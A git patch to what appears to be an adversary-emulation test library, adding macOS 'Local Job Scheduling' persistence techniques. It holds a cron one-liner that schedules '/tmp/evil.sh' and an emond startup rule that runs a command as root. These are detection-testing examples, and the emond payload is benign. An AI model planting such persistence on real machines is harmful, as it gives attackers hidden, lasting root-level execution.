From 99db88ff0dbc17bcaad27e2a84e47f29b2cd0e0c Mon Sep 17 00:00:00 2001
From: Dan Bourke <dbourke@atlassian.com>
Date: Tue, 13 Feb 2018 14:36:59 +1100
Subject: [PATCH] add emond persistence mechanism

---
 Mac/Persistence/Local_Job_Scheduling.md | 45 ++++++++++++++++++++++++-
 1 file changed, 44 insertions(+), 1 deletion(-)

diff --git a/Mac/Persistence/Local_Job_Scheduling.md b/Mac/Persistence/Local_Job_Scheduling.md
index 09435f6a..3a12287a 100644
--- a/Mac/Persistence/Local_Job_Scheduling.md
+++ b/Mac/Persistence/Local_Job_Scheduling.md
@@ -1,6 +1,49 @@
-# Cron Job
+# Local Job Scheduling
 
 MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
 
+### Cron Job
 
     echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
+
+### Emond
+
+copy this file into /etc/emond.d/rules/atomicredteam.plist
+
+    <?xml version="1.0" encoding="UTF-8"?>
+    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+    <plist version="1.0">
+    <array>
+        <dict>
+            <key>name</key>
+            <string>atomicredteam</string>
+            <key>enabled</key>
+            <true/>
+            <key>eventTypes</key>
+            <array>
+                <string>startup</string>
+            </array>
+            <key>actions</key>
+            <array>
+                <dict>
+                    <key>command</key>
+                    <string>/usr/bin/say</string>
+                    <key>user</key>
+                    <string>root</string>
+                    <key>arguments</key>
+                        <array>
+                            <string>-v Tessa</string>
+                            <string>I am a persistent startup item.</string>
+                        </array>
+                    <key>type</key>
+                    <string>RunCommand</string>
+                </dict>
+            </array>
+        </dict>
+    </array>
+    </plist>
+
+create an empty file in /private/var/db/emondClients/
+
+    sudo touch /private/var/db/emondClients/randomflag
+